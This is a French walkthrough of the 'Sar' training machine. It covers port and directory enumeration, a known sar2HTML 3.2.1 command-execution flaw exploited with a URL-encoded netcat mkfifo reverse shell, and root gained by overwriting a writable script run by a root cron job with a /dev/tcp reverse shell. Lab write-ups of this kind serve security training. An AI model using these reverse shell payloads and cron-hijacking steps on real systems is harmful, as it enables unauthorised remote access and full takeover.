Sar

sar2HTML cronjob

Nom machine : Sar
Difficulté : Easy
OS : Linux

Enumération

NMAP

Nmap scan report for 192.168.228.35
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 33:40:be:13:cf:51:7d:d6:a5:9c:64:c8:13:e5:f2:9f (RSA)
|   256 8a:4e:ab:0b:de:e3:69:40:50:98:98:58:32:8f:71:9e (ECDSA)
|_  256 e6:2f:55:1c:db:d0:bb:46:92:80:dd:5f:8e:a3:0a:41 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80)

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.228.35/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.228.35/__24-08-26_09-49-52.txt

Target: http://192.168.228.35/

[09:49:52] Starting: 
[09:49:55] 403 -  279B  - /.ht_wsr.txt
[09:49:55] 403 -  279B  - /.htaccess.orig
[09:49:55] 403 -  279B  - /.htaccess.sample
[09:49:55] 403 -  279B  - /.htaccess.save
[09:49:55] 403 -  279B  - /.htaccess_extra
[09:49:55] 403 -  279B  - /.htaccess_orig
[09:49:55] 403 -  279B  - /.htaccess_sc
[09:49:55] 403 -  279B  - /.htaccessBAK
[09:49:55] 403 -  279B  - /.htaccessOLD
[09:49:55] 403 -  279B  - /.htaccessOLD2
[09:49:55] 403 -  279B  - /.htm
[09:49:55] 403 -  279B  - /.html
[09:49:55] 403 -  279B  - /.htpasswd_test
[09:49:55] 403 -  279B  - /.htpasswds
[09:49:55] 403 -  279B  - /.httr-oauth
[09:49:56] 403 -  279B  - /.htaccess.bak1
[09:49:56] 403 -  279B  - /.php
[09:50:20] 200 -   24KB - /phpinfo.php
[09:50:23] 200 -    9B  - /robots.txt
[09:50:23] 403 -  279B  - /server-status/
[09:50:23] 403 -  279B  - /server-status

Task Completed

robots.txt : sar2HTML

verison : 3.2.1

Accès initial

Sar2HTML 3.2.1 - Remote Command ExecutionExploit Database

Nous allons injecter le payload nc mkfifo avec encodage URL sur le port 1234.

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.224%201234%20%3E%2Ftmp%2Ff

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.228.35] 38454
bash: cannot set terminal process group (1018): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$ ls

elévation des privilèges

www-data@sar:/home/love$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh

www-data@sar:/var/www/html$ cat finally.sh
#!/bin/sh

./write.sh

www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/sh

touch /tmp/gateway

Nous avons tous les droits sur write.sh (nous pouvons aussi supprimer et ajouter des fichiers dans ce dossier).

www-data@sar:/var/www/html$ echo "/bin/bash -i >& /dev/tcp/192.168.45.224/1235 0>&1" > write.sh

Plus qu'à se faire un café et attendre 5 minutes.

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1235
listening on [any] 1235 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.228.35] 44676
bash: cannot set terminal process group (2568): Inappropriate ioctl for device
bash: no job control in this shell
root@sar:/var/www/html# whoami
root

PrécédentNoName SuivantStapler

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagHTTP (80)

hashtagAccès initial

hashtagelévation des privilèges

Enumération

NMAP

HTTP (80)

Accès initial

elévation des privilèges